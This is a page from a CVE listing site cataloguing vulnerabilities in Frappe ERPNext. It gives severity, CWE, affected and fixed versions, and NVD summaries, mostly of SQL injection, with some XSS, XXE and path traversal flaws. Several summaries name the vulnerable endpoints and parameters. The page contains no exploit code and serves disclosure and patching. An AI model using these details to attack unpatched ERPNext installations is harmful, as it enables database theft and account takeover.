cbcvebase.

Frappe Erpnext vulnerabilities

61 known vulnerabilities affecting frappe/erpnext.

Total CVEs
61
CISA KEV
0
Public exploits
3
Exploited in wild
0
Severity breakdown
CRITICAL7HIGH21MEDIUM31LOW2

Vulnerabilities

Page 2 of 4
CVE-2026-32954P3HIGHCVSS 7.5fixed in 15.100.0≥ 16.0.0, < 16.8.0+1 more2026-03-20
CVE-2026-32954 [HIGH] CWE-89 CVE-2026-32954: ERP is a free and open source Enterprise Resource Planning tool. In versions prior to 16.8.0 and 15. ERP is a free and open source Enterprise Resource Planning tool. In versions prior to 16.8.0 and 15.100.0, certain endpoints were vulnerable to time-based and boolean-based blind SQL injection due to insufficient parameter validation, allowing attackers to infer database information. This issue has been fixed in versions 15.100.0 and 16.8.0.
nvd
CVE-2018-3884P3HIGHCVSS 8.8v10.1.62018-09-12
CVE-2018-3884 [HIGH] CWE-89 CVE-2018-3884: An exploitable SQL injection vulnerability exists in the authenticated part of ERPNext v10.1.6. Spec An exploitable SQL injection vulnerability exists in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. The sort_by and start parameter can be used to perform an SQL injection attack. An attacker can use a browser to trigger these vulnerabilities, and no special tools are requi
nvd
CVE-2018-3883P3HIGHCVSS 8.8v10.1.62018-09-12
CVE-2018-3883 [HIGH] CWE-89 CVE-2018-3883: An exploitable SQL injection vulnerability exists in the authenticated part of ERPNext v10.1.6. Spec An exploitable SQL injection vulnerability exists in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. The employee and sort_order parameter can be used to perform an SQL injection attack. An attacker can use a browser to trigger these vulnerabilities, and no special tools are
nvd
CVE-2018-3885P3HIGHCVSS 8.8v10.1.62018-09-12
CVE-2018-3885 [HIGH] CWE-89 CVE-2018-3885: An exploitable SQL injection vulnerability exists in the authenticated part of ERPNext v10.1.6. Spec An exploitable SQL injection vulnerability exists in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. The order_by parameter can be used to perform an SQL injection attack. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.
nvd
CVE-2018-3882P3HIGHCVSS 8.8v10.1.62018-09-12
CVE-2018-3882 [HIGH] CWE-89 CVE-2018-3882: An exploitable SQL injection vulnerability exists in the authenticated part of ERPNext v10.1.6. Spec An exploitable SQL injection vulnerability exists in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. The searchfield parameter can be used to perform an SQL injection attack. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.
nvd
CVE-2025-52044P3HIGHCVSS 7.5v15.57.52025-09-16
CVE-2025-52044 [HIGH] CWE-89 CVE-2025-52044: In Frappe ERPNext v15.57.5, the function get_stock_balance() at erpnext/stock/utils.py is vulnerable In Frappe ERPNext v15.57.5, the function get_stock_balance() at erpnext/stock/utils.py is vulnerable to SQL Injection, which allows an attacker to extract all information from databases by injecting SQL query into inventory_dimensions_dict parameter.
nvd
CVE-2026-44447P3HIGHCVSS 7.5fixed in 16.9.02026-05-13
CVE-2026-44447 [HIGH] CWE-89 CVE-2026-44447: ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 16.9.0, some endpoints ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 16.9.0, some endpoints were vulnerable to SQL injection through specially crafted requests, which would allow a malicious actor to extract sensitive information. This vulnerability is fixed in 16.9.0.
nvd
CVE-2026-44446P3HIGHCVSS 7.5fixed in 15.104.3≥ 16.0.0, < 16.14.0+1 more2026-05-13
CVE-2026-44446 [HIGH] CWE-89 CVE-2026-44446: ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.104.3 and 16.14.0, ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.104.3 and 16.14.0, some endpoints were vulnerable to SQL injection through specially crafted requests, which would allow a malicious actor to extract sensitive information. This vulnerability is fixed in 15.104.3 and 16.14.0.
nvd
CVE-2025-65267P3CRITICALCVSS 9.0v15.83.22025-12-03
CVE-2025-65267 [CRITICAL] CWE-79 CVE-2025-65267: In ERPNext v15.83.2 and Frappe Framework v15.86.0, improper validation of uploaded SVG avatar images In ERPNext v15.83.2 and Frappe Framework v15.86.0, improper validation of uploaded SVG avatar images allows attackers to embed malicious JavaScript. The payload executes when an administrator clicks the image link to view the avatar, resulting in stored cross-site scripting (XSS). Successful exploitation may lead to account takeover, privilege esca
nvd
CVE-2018-20061P3HIGHCVSS 7.5≥ 10.0.0, ≤ 10.1.76≥ 11.0.0, < 11.0.3+1 more2018-12-11
CVE-2018-20061 [HIGH] CWE-89 CVE-2018-20061: A SQL injection issue was discovered in ERPNext 10.x and 11.x through 11.0.3-beta.29. This attack is A SQL injection issue was discovered in ERPNext 10.x and 11.x through 11.0.3-beta.29. This attack is only available to a logged-in user; however, many ERPNext sites allow account creation via the web. No special privileges are needed to conduct the attack. By calling a JavaScript function that calls a server-side Python function with carefully chosen a
nvd
CVE-2025-56380P3MEDIUMCVSS 6.5v15.67.02025-10-02
CVE-2025-56380 [MEDIUM] CWE-89 CVE-2025-56380: Frappe Framework v15.72.4 was discovered to contain a SQL injection vulnerability via the fieldname Frappe Framework v15.72.4 was discovered to contain a SQL injection vulnerability via the fieldname parameter in the frappe.client.get_value API endpoint and a crafted script to the fieldname parameter
nvd
CVE-2025-56381P3MEDIUMCVSS 6.5v15.67.02025-10-02
CVE-2025-56381 [MEDIUM] CWE-89 CVE-2025-56381: ERPNEXT v15.67.0 was discovered to contain multiple SQL injection vulnerabilities in the /api/method ERPNEXT v15.67.0 was discovered to contain multiple SQL injection vulnerabilities in the /api/method/frappe.desk.reportview.get endpoint via the order_by and group_by parameters.
nvd
CVE-2025-52050P3MEDIUMCVSS 6.5v15.57.52025-09-30
CVE-2025-52050 [MEDIUM] CWE-89 CVE-2025-52050: In Frappe ERPNext 15.57.5, the function get_loyalty_program_details_with_points() at erpnext/account In Frappe ERPNext 15.57.5, the function get_loyalty_program_details_with_points() at erpnext/accounts/doctype/loyalty_program/loyalty_program.py is vulnerable to SQL Injection, which allows an attacker to extract all information from databases by injecting a SQL query into the expiry_date parameter.
nvd
CVE-2026-44445P3MEDIUMCVSS 6.5fixed in 15.104.3≥ 16.0.0, < 16.12.0+1 more2026-05-13
CVE-2026-44445 [MEDIUM] CWE-611 CVE-2026-44445: ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.104.3 and 16.12.0, ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.104.3 and 16.12.0, an improper restriction of XML external entity (XXE) reference vulnerability in the EDI Module enables an authenticated attacker to read files from the local file system, including sensitive configuration files. This vulnerability is fixed in 15.104.3
nvd
CVE-2025-52049P3MEDIUMCVSS 6.5v15.57.52025-09-30
CVE-2025-52049 [MEDIUM] CWE-89 CVE-2025-52049: In Frappe ErpNext v15.57.5, the function get_timesheet_detail_rate() at erpnext/projects/doctype/tim In Frappe ErpNext v15.57.5, the function get_timesheet_detail_rate() at erpnext/projects/doctype/timesheet/timesheet.py is vulnerable to SQL Injection, which allows an attacker to extract all information from databases by injecting SQL query into the timelog parameter.
nvd
CVE-2025-52043P3MEDIUMCVSS 6.5v15.57.52025-09-30
CVE-2025-52043 [MEDIUM] CWE-89 CVE-2025-52043: In Frappe ERPNext v15.57.5, the function import_coa() at erpnext/accounts/doctype/chart_of_accounts_ In Frappe ERPNext v15.57.5, the function import_coa() at erpnext/accounts/doctype/chart_of_accounts_importer/chart_of_accounts_importer.py is vulnerable to SQL injection, which allows an attacker to extract all information from databases by injecting a SQL query into the company parameter.
nvd
CVE-2025-52047P3MEDIUMCVSS 6.5v15.57.52025-09-30
CVE-2025-52047 [MEDIUM] CWE-89 CVE-2025-52047: In Frappe ErpNext v15.57.5, the function get_income_account() at erpnext/controllers/queries.py is v In Frappe ErpNext v15.57.5, the function get_income_account() at erpnext/controllers/queries.py is vulnerable to SQL Injection, which allows an attacker to extract all information from databases by injecting a SQL query into the filters.disabled parameter.
nvd
CVE-2026-44448P3MEDIUMCVSS 6.5fixed in 15.102.0≥ 16.0.0, < 16.11.0+1 more2026-05-13
CVE-2026-44448 [MEDIUM] CWE-862 CVE-2026-44448: ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.102.0 and 16.11.0, ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.102.0 and 16.11.0, certain endpoints failed to enforce proper authorization checks, allowing users to modify data beyond their permitted role. This vulnerability is fixed in 15.102.0 and 16.11.0.
nvd
CVE-2026-44440P4MEDIUMCVSS 5.7fixed in 15.101.1≥ 16.0.0, < 16.10.0+1 more2026-05-13
CVE-2026-44440 [MEDIUM] CWE-22 CVE-2026-44440: ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.101.1 and 16.10.0, ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.101.1 and 16.10.0, an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability on an endpoint allows an authenticated adjacent attacker to read arbitrary files. This vulnerability is fixed in 15.101.1 and 16.10.0.
nvd
CVE-2026-42840P4MEDIUMCVSS 5.1v16.16.02026-06-03
CVE-2026-42840 [MEDIUM] CWE-79 CVE-2026-42840: An authenticated user can persist arbitrary HTML/JavaScript in the email_id or mobile_no fields of a An authenticated user can persist arbitrary HTML/JavaScript in the email_id or mobile_no fields of a Customer record and trigger unescaped rendering in the Point of Sale (POS) interface for every operator who selects that customer. This issue affects ERPNext: 16.16.0.
nvd
Frappe Erpnext vulnerabilities | cvebase